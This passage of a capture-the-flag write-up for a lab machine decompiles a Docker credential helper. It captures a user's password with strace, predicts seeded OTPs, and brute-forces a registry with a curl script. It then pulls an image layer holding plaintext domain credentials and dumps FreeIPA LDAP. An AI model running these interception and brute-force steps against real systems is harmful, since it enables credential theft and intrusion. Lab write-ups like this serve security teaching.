Dictionary<string, (Action<object>, InputType)> dictionary1 = new Dictionary<string, (Action<object>, InputType)>();
dictionary1.Add("get", (new Action<object>(HandleGet), InputType.Plain));
dictionary1.Add("store", (new Action<object>(HandleStore), InputType.Json));
dictionary1.Add("otp", (new Action<object>(HandleOtp), InputType.None));
(Action<object>, InputType) valueTuple;
if (!dictionary1.TryGetValue(args[0], ref valueTuple))
{
Console.WriteLine("Not implemented.");
}
else
{
object obj = (object) "";
if (valueTuple.Item2 != InputType.None)
{
string json = Console.ReadLine();
if (json == null)
{
Console.Error.WriteLine("Input is empty");
return;
}
switch (valueTuple.Item2)
{
case InputType.Plain:
obj = (object) json;
break;
case InputType.Json:
try
{
Dictionary<string, object> dictionary2 = JsonSerializer.Deserialize<Dictionary<string, object>>(json);
if (dictionary2 == null)
{
Console.Error.WriteLine("Invalid JSON format");
return;
}
obj = (object) dictionary2;
break;
}
catch (JsonException ex)
{
Console.Error.WriteLine("Invalid JSON data");
return;
}
}
}
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__0 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__0 = CallSite<Action<CallSite, Action<object>, object>>.Create(Binder.Invoke(CSharpBinderFlags.ResultDiscarded, typeof (Program), (IEnumerable<CSharpArgumentInfo>) new CSharpArgumentInfo[2]
{
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.UseCompileTimeType, (string) null),
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, (string) null)
}));
Program.\u003C\u003Eo__0.\u003C\u003Ep__0.Target((CallSite) Program.\u003C\u003Eo__0.\u003C\u003Ep__0, valueTuple.Item1, obj);
}
}
static UnixUserInfo GetCurrentExecutableOwner() => new UnixFileInfo("/proc/self/exe").OwnerUser;
static string GetCredsPath(string username) => "/home/" + username + "/.docker/creds";
static void HandleOtp(object dynamicArgs)
{
new Random(DateTime.Now.Minute / 10 + (int) GetCurrentExecutableOwner().UserId).Next(100000, 999999);
Console.WriteLine("OTP is currently experimental. Please ask our admins for one");
}
static void HandleGet(object dynamicArgs)
{
byte[] numArray1 = Convert.FromBase64String(File.ReadAllText(GetCredsPath(GetCurrentExecutableOwner().UserName)));
using (Aes aes = Aes.Create())
{
byte[] numArray2 = new byte[16];
byte[] numArray3 = new byte[16];
aes.Key = numArray2;
aes.IV = numArray3;
ICryptoTransform decryptor = aes.CreateDecryptor(aes.Key, aes.IV);
using (MemoryStream memoryStream = new MemoryStream(numArray1))
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read))
{
using (StreamReader streamReader = new StreamReader((Stream) cryptoStream))
{
string end = ((TextReader) streamReader).ReadToEnd();
Credentials credentials;
try
{
credentials = JsonSerializer.Deserialize<Credentials>(end);
}
catch (JsonException ex)
{
Console.Error.WriteLine("Invalid credentials format");
return;
}
if (credentials.Username == null)
Console.Error.WriteLine("Missing username");
else if (credentials.Secret == null)
{
Console.Error.WriteLine("Missing secret");
}
else
{
Console.Error.WriteLine("This account might be protected by two-factor authentication");
Console.Error.WriteLine("In case login fails, try logging in with <password><otp>");
Console.WriteLine(end);
}
}
}
}
}
}
static void HandleStore(object dynamicArgs)
{
Dictionary<string, object> dictionary = dynamicArgs as Dictionary<string, object>;
object obj1;
if (!dictionary.TryGetValue("Username", ref obj1))
{
Console.Error.WriteLine("No username provided");
}
else
{
object obj2;
if (!dictionary.TryGetValue("Secret", ref obj2))
{
Console.Error.WriteLine("No secret provided");
}
else
{
Credentials credentials1 = new Credentials();
ref Credentials local1 = ref credentials1;
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__2 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__2 = CallSite<Func<CallSite, object, string>>.Create(Binder.Convert(CSharpBinderFlags.None, typeof (string), typeof (Program)));
Func<CallSite, object, string> target1 = Program.\u003C\u003Eo__0.\u003C\u003Ep__2.Target;
CallSite<Func<CallSite, object, string>> p2 = Program.\u003C\u003Eo__0.\u003C\u003Ep__2;
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__1 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__1 = CallSite<Func<CallSite, Type, object, object>>.Create(Binder.InvokeMember(CSharpBinderFlags.None, "ToString", (IEnumerable<Type>) null, typeof (Program), (IEnumerable<CSharpArgumentInfo>) new CSharpArgumentInfo[2]
{
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.UseCompileTimeType | CSharpArgumentInfoFlags.IsStaticType, (string) null),
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, (string) null)
}));
object obj3 = Program.\u003C\u003Eo__0.\u003C\u003Ep__1.Target((CallSite) Program.\u003C\u003Eo__0.\u003C\u003Ep__1, typeof (Convert), obj1);
string str1 = target1((CallSite) p2, obj3);
local1.Username = str1;
ref Credentials local2 = ref credentials1;
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__4 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__4 = CallSite<Func<CallSite, object, string>>.Create(Binder.Convert(CSharpBinderFlags.None, typeof (string), typeof (Program)));
Func<CallSite, object, string> target2 = Program.\u003C\u003Eo__0.\u003C\u003Ep__4.Target;
CallSite<Func<CallSite, object, string>> p4 = Program.\u003C\u003Eo__0.\u003C\u003Ep__4;
if (Program.\u003C\u003Eo__0.\u003C\u003Ep__3 == null)
Program.\u003C\u003Eo__0.\u003C\u003Ep__3 = CallSite<Func<CallSite, Type, object, object>>.Create(Binder.InvokeMember(CSharpBinderFlags.None, "ToString", (IEnumerable<Type>) null, typeof (Program), (IEnumerable<CSharpArgumentInfo>) new CSharpArgumentInfo[2]
{
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.UseCompileTimeType | CSharpArgumentInfoFlags.IsStaticType, (string) null),
CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, (string) null)
}));
object obj4 = Program.\u003C\u003Eo__0.\u003C\u003Ep__3.Target((CallSite) Program.\u003C\u003Eo__0.\u003C\u003Ep__3, typeof (Convert), obj2);
string str2 = target2((CallSite) p4, obj4);
local2.Secret = str2;
Credentials credentials2 = credentials1;
using (Aes aes = Aes.Create())
{
byte[] numArray1 = new byte[16];
byte[] numArray2 = new byte[16];
aes.Key = numArray1;
aes.IV = numArray2;
ICryptoTransform encryptor = aes.CreateEncryptor(aes.Key, aes.IV);
using (MemoryStream memoryStream = new MemoryStream())
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, encryptor, CryptoStreamMode.Write))
{
using (StreamWriter streamWriter = new StreamWriter((Stream) cryptoStream))
((TextWriter) streamWriter).Write(JsonSerializer.Serialize<Credentials>(credentials2));
string base64String = Convert.ToBase64String(memoryStream.ToArray());
File.WriteAllText(GetCredsPath(GetCurrentExecutableOwner().UserName), base64String);
}
}
}
}
}
}It stores encrypted Docker credentials at:
/home/rebecca_smith/.docker/credsDocker uses this binary (via credsStore) during docker login and docker pull.
The
HandleOtpfunction reveals how it forges the password to sign in Docker Registry with user credentials and OTP, which we will bring it up in the following section.
Strace for Leak
From Pspy, we can observe that docker-credential-docker-auth get is called in the very early stage of the sudo docker login command, which was initiated by the root user:

And the real login request from rebecca_smith (UID=2003) came behind:

Therefore, we can manage to intercept the docker-credential-docker-auth get call, which dereferences the stored Docker credentials, via the sudo strace primitive.
Therefore, we can manage to intercept the docker-credential-docker-auth get call, which dereferences the stored Docker credentials, via the sudo strace primitive.
Before running
docker login, we can see the end ofps -efoutput:... root 196844 1262 0 01:25 ? 00:00:00 sshd: tom_summers_admin [priv] tom_sum+ 197102 196844 0 01:26 ? 00:00:00 sshd: tom_summers_admin@pts/4 tom_sum+ 197160 197102 0 01:26 pts/4 00:00:00 -bash tom_sum+ 198167 197160 99 01:26 pts/4 00:00:00 ps -efAfter running
docker login:... root 199599 2 0 01:27 ? 00:00:00 [kworker/1:2-rcu_par_gp] root 199647 2 0 01:27 ? 00:00:00 [kworker/3:2-rcu_par_gp] root 200426 196697 0 01:28 pts/3 00:00:00 sudo -u rebecca_smith /usr/bin/docker login root 200427 200426 0 01:28 pts/5 00:00:00 sudo -u rebecca_smith /usr/bin/docker login rebecca+ 200428 200427 0 01:28 pts/5 00:00:00 /usr/bin/docker login tom_sum+ 200550 197160 99 01:28 pts/4 00:00:00 ps -efWe don't see the helper (
docker-credential-docker-auth) in thepsoutput. That's because it spawns and exits too quickly to catch with a normalps -efdiff.
To catch the flashy docker-credential-docker-auth process, we can create a watch docker helper script:
#!/bin/bash
# watch_docker_helper.sh
echo "[*] Watching for docker-credential-docker-auth..."
while true; do
pid=$(pgrep -u rebecca_smith -f docker-credential-docker-auth)
if [[ -n "$pid" ]]; then
echo "[+] Found docker-credential-docker-auth: PID $pid"
sudo -u rebecca_smith strace -s 128 -p "$pid" -f
break
fi
sleep 0.05
doneWe can run
sudo ... strace ...with-fat the end of the command.
strace -fwill follow forked processes, including any subprocess or thread spawned inside.
Keep it running. Then in another terminal, we run:
sudo -u rebecca_smith /usr/bin/docker loginThe before/after process diff does spawn the chain:
→ sudo (as root)
→ /usr/bin/docker-credential-docker-auth (as rebecca_smith)
→ /usr/bin/docker login (as rebecca_smith)Once the bash script catches the spawned process:
tom_summers_admin@main:~$ bash watch_docker_helper.sh
[*] Watching for docker-credential-docker-auth...
[+] Found docker-credential-docker-auth: PID 211422
strace: Process 211422 attached with 8 threads
[pid 211432] read(35, <unfinished ...>
[pid 211430] restart_syscall(<... resuming interrupted read ...> <unfinished ...>
[pid 211429] restart_syscall(<... resuming interrupted read ...> <unfinished ...>We confirm credential leak via strace — the helper writes this to FD 33 (write(33, ...)) — a pipe connected to Docker"s stdin:

Same password retrieved from the unintended way, with the OTP stripped:
-7eAZDp9-f9mgThis allows us to SSH login as rebecca_smith, and btw we tunnel port 5000 for further inspection on the Docker Registry:
ssh -L 5000:127.0.0.1:5000 [email protected]
OTP
We cannot use Rebecca's credentials to login the Docker Registry:
rebecca_smith@main:~$ curl -u 'rebecca_smith:-7eAZDp9-f9mg' http://127.0.0.1:5000/v2/_catalog
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}Because the helper printed a warning:
rebecca_smith@main:~$ echo '{"ServerURL":"http://127.0.0.1:5000/v2"}' | /usr/bin/docker-credential-docker-auth get
This account might be protected by two-factor authentication
In case login fails, try logging in with <password><otp>
{"Username":"rebecca_smith","Secret":"-7eAZDp9-f9mg"}The endpoint http://127.0.0.1:5000/... requires the password + OTP as the HTTP basic auth -u parameter.
Therefore, our goal is to get the correct 6-digit OTP that matches rebecca_smith's 2FA config, append it to the static password, and use:
curl -u 'rebecca_smith':"<static_password><otp>" http://127.0.0.1:5000/v2/... From our .NET reverse earlier, the function HandleOtp() was defined as:
static void HandleOtp(object dynamicArgs)
{
new Random(DateTime.Now.Minute / 10 + (int) GetCurrentExecutableOwner().UserId).Next(100000, 999999);
Console.WriteLine("OTP is currently experimental. Please ask our admins for one");
}This is using System.Random in c#, which is deterministic if seeded with a known value.
Therefore, we can write a short C# snippet that:
- Takes UID of
rebecca_smith(e.g.,id -u rebecca_smith→ 2003) - Gets the current minute
- Calculates seed =
(minute / 10) + uid(means OTP updates every 10 minutes) - Seeds
Random(seed)and gets.Next(100000, 999999) - Appends result to static password
-7eAZDp9-f9mg
Since uid = 2003, we can get the OTPs by creating a throw-away console project:
dotnet new console -n otpThen overwrite the generated Program.cs:
using System;
class Program
{
static void Main()
{
for (int block = 0; block < 6; block++)
{
int seed = 2003 + block; // UID 2003 + minute_block
int otp = new Random(seed).Next(100000, 999999);
Console.WriteLine($"block {block} seed {seed} OTP {otp}");
}
}
}Build and run:
$ dotnet run --project otp
block 0 seed 2003 OTP 229732
block 1 seed 2004 OTP 699914
block 2 seed 2005 OTP 270098
block 3 seed 2006 OTP 740280
block 4 seed 2007 OTP 310463
block 5 seed 2008 OTP 780645Key insight:
The famous password we saw earlier from the unintended way,
-7eAZDp9-f9mg310463, is simply the base secret plus the OTP for block 4 (40-49 minutes)
Script to enumerate:
#!/usr/bin/env bash
BASE="-7eAZDp9-f9mg"
USER="rebecca_smith"
URL="http://127.0.0.1:5000/v2/"
# OTPs for blocks 0-5 (seeds 2003-2008)
OTPS=(229732 699914 270098 740280 310463 780645)
for otp in "${OTPS[@]}"; do
pwd="${BASE}${otp}"
echo "[*] Trying OTP $otp …"
# Ask only for the headers first (-I); capture HTTP status
code=$(curl -s -o /dev/null -w "%{http_code}" -u "$USER:$pwd" -I "$URL")
if [[ "$code" == "200" || "$code" == "302" || "$code" == "307" ]]; then
echo "[+] OTP $otp accepted (HTTP $code)"
curl -u "$USER:$pwd" "$URL"
exit 0
fi
done
echo "[!] None of the six OTPs worked in this 10-minute window."Bingo:
rebecca_smith@main:/dev/shm$ bash t.sh
[*] Trying OTP 229732 …
[*] Trying OTP 699914 …
[+] OTP 699914 accepted (HTTP 200)
rebecca_smith@main:/dev/shm$ curl -u 'rebecca_smith:-7eAZDp9-f9mg699914' http://127.0.0.1:5000/v2/_catalogog
{"repositories":["test-domain-workstation"]}We can always use this script to check which one works for the moment.
Docker Registry v2 endpoints we can access:
/v2/_catalog– list repositories/v2/<repo>/tags/list– list image tags/v2/<repo>/manifests/<tag>– resolve blob digests
List the tags of the repository:
rebecca_smith@main:/dev/shm$ curl -s -u 'rebecca_smith:-7eAZDp9-f9mg699914' \
http://127.0.0.1:5000/v2/test-domain-workstation/tags/list
{"name":"test-domain-workstation","tags":["latest"]}Fetch the manifest for that latest tag:
curl -s -u 'rebecca_smith:-7eAZDp9-f9mg699914' \
-H 'Accept: application/vnd.docker.distribution.manifest.v2+json' \
"http://127.0.0.1:5000/v2/test-domain-workstation/manifests/latest"As a result:
{
"schemaVersion": 2,
"mediaType": "application/vnd.docker.distribution.manifest.v2+json",
"config": {
"mediaType": "application/vnd.docker.container.image.v1+json",
"size": 2063,
"digest": "sha256:f7e583abfef8af83c33bafd3498c75ab11680d1eb7ad652cdae61e5b714b1de6"
},
"layers": [
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 30610919,
"digest": "sha256:802008e7f7617aa11266de164e757a6c8d7bb57ed4c972cf7e9f519dd0a21708"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 29979842,
"digest": "sha256:92879ec4738326a2ab395b2427c2ba16d7dcf348f84477653a635c86d0146cb7"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 100598014,
"digest": "sha256:bff382edc3a6db932abb361e3bd5aa09521886b0b79792616fc346b19a9497ea"
},
{
"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
"size": 246,
"digest": "sha256:292e59a87dfb0fb3787c3889e4c1b81bfef0cd2f3378c61f281a4c7a02ad1787"
}
]
}We now have the manifest and can see the small 246-byte layer:
sha256:292e59a87dfb0fb3787c3889e4c1b81bfef0cd2f3378c61f281a4c7a02ad1787Download the layer blob:
DIGEST=sha256:292e59a87dfb0fb3787c3889e4c1b81bfef0cd2f3378c61f281a4c7a02ad1787
PASS='-7eAZDp9-f9mg699914' # current OTP password, change at time
USER='rebecca_smith'
curl -u "$USER:$PASS" \
"http://127.0.0.1:5000/v2/test-domain-workstation/blobs/$DIGEST" \
--output blob.tarExtract and inspect:
tar -xvf blob.tarInside, it's a docker-entrypoint.sh:
#!/bin/bash
ipa-client-install --unattended --principal donna_adams --password 3FEVPCT_c3xDH \
--server dc01.sorcery.htb --domain sorcery.htb --no-ntp --force-join --mkhomedirWe now have a domain credential:
Principal : [email protected]
Password : 3FEVPCT_c3xDHSSH login:

Free IPA
Overview
From the LinPEAS result, we know IPA is enabled in the target. Free IPA is Red Hat’s open-source Identity, Policy & Audit platform.
Think of it as an on-prem “Active Directory-for-Linux” bundle that combines:
| Component | Role in IPA |
|---|---|
| 389-DS | LDAP directory for user, group, host, sudo, HBAC data. |
| MIT Kerberos | Single-sign-on tickets (kinit, klist, etc.). |
| Dogtag CA | Optional certificate authority for host / service certs. |
| Bind DNS | Realm-aware DNS with dynamic updates. |
| SSSD | Client-side daemon that glues LDAP+Kerberos into NSS & PAM. |
| CLI / Web UI | ipa command and a web console for administration. |
So when a Linux host “joins” an IPA realm it gains:
- a host principal (
host/<fqdn>@REALM) and keytab in/etc/krb5.keytab; - PAM/SSSD config so domain users can SSH or sudo with their realm creds;
- centralized sudo / HBAC / automount / cert policies.
According to the previous exfiltration from the Docker Registry:
# docker-entrypoint.sh
ipa-client-install \
--unattended \ # run non-interactively—no prompts
--principal donna_adams \ # bind to IPA using this user account
--password 3FEVPCT_c3xDH \ # password for that principal
--server dc01.sorcery.htb \ # specific IPA server to contact
--domain sorcery.htb \ # DNS domain / Kerberos realm
--no-ntp \ # don’t configure NTP (time sync)
--force-join \ # join even if already enrolled
--mkhomedir # create home directories on first loginIt initiates the IPA installation:
- Clock check (unless
--no-ntp): Kerberos needs clocks within 5 min. - Kerberos authentication: Uses the supplied principal/password to get a Ticket-Granting Ticket (TGT).
- Host entry creation / update: Through LDAP it creates (or updates) an object like
host/main.sorcery.htbwith SSH keys, OS, etc. - Keytab retrieval: Downloads a keytab containing keys for
host/[email protected]→ stored in/etc/krb5.keytab. - Configure SSSD, NSS, PAM: Writes
/etc/sssd/sssd.conf,krb5.conf, sudo/HBAC rules,pam_mkhomedir. - Service restart: Starts
sssdso logins are realm-aware immediately.
ipa-client-install joined the box to the SORCERY.HTB realm using donna_adams / 3FEVPCT_c3xDH. The plaintext password is now our foothold into Free IPA / Kerberos, letting us enumerate or escalate control over the entire domain.
Domain Enumeration
From previous LinPEAS enumeration, we see /etc/ipa/default.conf:
[global]
basedn = dc=sorcery,dc=htb
realm = SORCERY.HTB
domain = sorcery.htb
server = dc01.sorcery.htb
host = main.sorcery.htb
xmlrpc_uri = https://dc01.sorcery.htb/ipa/xml
enable_ra = TrueAnonymous LDAP Access
We can try anonymous LDAP bind (but we have creds, nvm):
ldapsearch -x -H ldap://dc01.sorcery.htb -b "dc=sorcery,dc=htb"It reveals the full FreeIPA structure:
# sorcery.htb
dn: dc=sorcery,dc=htb
objectClass: top
objectClass: domain
objectClass: pilotObject
objectClass: domainRelatedObject
objectClass: nisDomainObject
dc: sorcery
info: IPA V2.0
nisDomain: sorcery.htb
associatedDomain: sorcery.htb
# accounts, sorcery.htb
dn: cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: accounts
# users, accounts, sorcery.htb
dn: cn=users,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: users
# groups, accounts, sorcery.htb
dn: cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: groups
# services, accounts, sorcery.htb
dn: cn=services,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: services
# computers, accounts, sorcery.htb
dn: cn=computers,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: computers
# hostgroups, accounts, sorcery.htb
dn: cn=hostgroups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: hostgroups
# ipservices, accounts, sorcery.htb
dn: cn=ipservices,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: ipservices
# alt, sorcery.htb
dn: cn=alt,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: alt
# ng, alt, sorcery.htb
dn: cn=ng,cn=alt,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: ng
# automount, sorcery.htb
dn: cn=automount,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: automount
# default, automount, sorcery.htb
dn: cn=default,cn=automount,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: default
# auto.master, default, automount, sorcery.htb
dn: automountmapname=auto.master,cn=default,cn=automount,dc=sorcery,dc=htb
objectClass: automountMap
objectClass: top
automountMapName: auto.master
# auto.direct, default, automount, sorcery.htb
dn: automountmapname=auto.direct,cn=default,cn=automount,dc=sorcery,dc=htb
objectClass: automountMap
objectClass: top
automountMapName: auto.direct
# /- auto.direct, auto.master, default, automount, sorcery.htb
dn: description=/- auto.direct,automountmapname=auto.master,cn=default,cn=auto
mount,dc=sorcery,dc=htb
objectClass: automount
objectClass: top
automountKey: /-
automountInformation: auto.direct
description: /- auto.direct
# hbac, sorcery.htb
dn: cn=hbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: hbac
# hbacservices, hbac, sorcery.htb
dn: cn=hbacservices,cn=hbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: hbacservices
# hbacservicegroups, hbac, sorcery.htb
dn: cn=hbacservicegroups,cn=hbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: hbacservicegroups
# sudo, sorcery.htb
dn: cn=sudo,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: sudo
# sudocmds, sudo, sorcery.htb
dn: cn=sudocmds,cn=sudo,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: sudocmds
# sudocmdgroups, sudo, sorcery.htb
dn: cn=sudocmdgroups,cn=sudo,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: sudocmdgroups
# sudorules, sudo, sorcery.htb
dn: cn=sudorules,cn=sudo,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: sudorules
# etc, sorcery.htb
dn: cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: etc
# locations, etc, sorcery.htb
dn: cn=locations,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: locations
# sysaccounts, etc, sorcery.htb
dn: cn=sysaccounts,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: sysaccounts
# ipa, etc, sorcery.htb
dn: cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: ipa
# replicas, ipa, etc, sorcery.htb
dn: cn=replicas,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: replicas
# dna, ipa, etc, sorcery.htb
dn: cn=dna,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: dna
# posix-ids, dna, ipa, etc, sorcery.htb
dn: cn=posix-ids,cn=dna,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: posix-ids
# subordinate-ids, dna, ipa, etc, sorcery.htb
dn: cn=subordinate-ids,cn=dna,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: subordinate-ids
# ca_renewal, ipa, etc, sorcery.htb
dn: cn=ca_renewal,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: ca_renewal
# certificates, ipa, etc, sorcery.htb
dn: cn=certificates,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: certificates
# custodia, ipa, etc, sorcery.htb
dn: cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: custodia
# dogtag, custodia, ipa, etc, sorcery.htb
dn: cn=dogtag,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: dogtag
# s4u2proxy, etc, sorcery.htb
dn: cn=s4u2proxy,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: s4u2proxy
# admin, users, accounts, sorcery.htb
dn: uid=admin,cn=users,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: person
objectClass: posixaccount
objectClass: krbprincipalaux
objectClass: krbticketpolicyaux
objectClass: inetuser
objectClass: ipaobject
objectClass: ipasshuser
objectClass: ipaSshGroupOfPubKeys
objectClass: ipaNTUserAttrs
uid: admin
cn: Administrator
sn: Administrator
uidNumber: 1638400000
gidNumber: 1638400000
homeDirectory: /home/admin
loginShell: /bin/bash
gecos: Administrator
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-500
# admins, groups, accounts, sorcery.htb
dn: cn=admins,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: groupofnames
objectClass: posixgroup
objectClass: ipausergroup
objectClass: ipaobject
objectClass: nestedGroup
objectClass: ipaNTGroupAttrs
cn: admins
description: Account administrators group
gidNumber: 1638400000
ipaUniqueID: 30051a92-96eb-11ef-a395-0242ac170002
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-512
# ipausers, groups, accounts, sorcery.htb
dn: cn=ipausers,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: groupofnames
objectClass: nestedgroup
objectClass: ipausergroup
objectClass: ipaobject
description: Default group for all users
cn: ipausers
ipaUniqueID: 300541ac-96eb-11ef-8324-0242ac170002
# editors, groups, accounts, sorcery.htb
dn: cn=editors,cn=groups,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: groupofnames
objectClass: posixgroup
objectClass: ipausergroup
objectClass: ipaobject
objectClass: nestedGroup
objectClass: ipantgroupattrs
gidNumber: 1638400002
description: Limited admins who can edit other users
cn: editors
ipaUniqueID: 30055df4-96eb-11ef-9a7a-0242ac170002
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1002
# ipaConfig, etc, sorcery.htb
dn: cn=ipaConfig,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
objectClass: ipaGuiConfig
objectClass: ipaConfigObject
objectClass: ipaUserAuthTypeClass
objectClass: ipaNameResolutionData
cn: ipaConfig
# cosTemplates, accounts, sorcery.htb
dn: cn=cosTemplates,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: cosTemplates
# selinux, sorcery.htb
dn: cn=selinux,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: selinux
# usermap, selinux, sorcery.htb
dn: cn=usermap,cn=selinux,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: usermap
# ranges, etc, sorcery.htb
dn: cn=ranges,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: ranges
# ca, sorcery.htb
dn: cn=ca,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: ca
# certprofiles, ca, sorcery.htb
dn: cn=certprofiles,cn=ca,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: certprofiles
# caacls, ca, sorcery.htb
dn: cn=caacls,cn=ca,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: caacls
# cas, ca, sorcery.htb
dn: cn=cas,cn=ca,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: cas
# roles, accounts, sorcery.htb
dn: cn=roles,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: roles
# pbac, sorcery.htb
dn: cn=pbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: pbac
# privileges, pbac, sorcery.htb
dn: cn=privileges,cn=pbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: privileges
# permissions, pbac, sorcery.htb
dn: cn=permissions,cn=pbac,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: permissions
# virtual operations, etc, sorcery.htb
dn: cn=virtual operations,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: virtual operations
# Managed Entries, etc, sorcery.htb
dn: cn=Managed Entries,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: Managed Entries
# Templates, Managed Entries, etc, sorcery.htb
dn: cn=Templates,cn=Managed Entries,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: Templates
# Definitions, Managed Entries, etc, sorcery.htb
dn: cn=Definitions,cn=Managed Entries,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: top
cn: Definitions
# automember, etc, sorcery.htb
dn: cn=automember,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: automember
# topology, ipa, etc, sorcery.htb
dn: cn=topology,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
cn: topology
# Domain Level, ipa, etc, sorcery.htb
dn: cn=Domain Level,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: top
objectClass: nsContainer
objectClass: ipaDomainLevelConfig
objectClass: ipaConfigObject
cn: Domain Level
# kerberos, sorcery.htb
dn: cn=kerberos,dc=sorcery,dc=htb
objectClass: krbContainer
objectClass: top
cn: kerberos
# SORCERY.HTB, kerberos, sorcery.htb
dn: cn=SORCERY.HTB,cn=kerberos,dc=sorcery,dc=htb
cn: SORCERY.HTB
objectClass: top
objectClass: krbrealmcontainer
objectClass: krbticketpolicyaux
# sig/dc01.sorcery.htb, custodia, ipa, etc, sorcery.htb
dn: cn=sig/dc01.sorcery.htb,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: ipaKeyPolicy
objectClass: ipaPublicKeyObject
objectClass: groupOfPrincipals
objectClass: top
cn: sig/dc01.sorcery.htb
# enc/dc01.sorcery.htb, custodia, ipa, etc, sorcery.htb
dn: cn=enc/dc01.sorcery.htb,cn=custodia,cn=ipa,cn=etc,dc=sorcery,dc=htb
objectClass: nsContainer
objectClass: ipaKeyPolicy
objectClass: ipaPublicKeyObject
objectClass: groupOfPrincipals
objectClass: top
cn: enc/dc01.sorcery.htb
# CAcert, ipa, etc, sorcery.htb
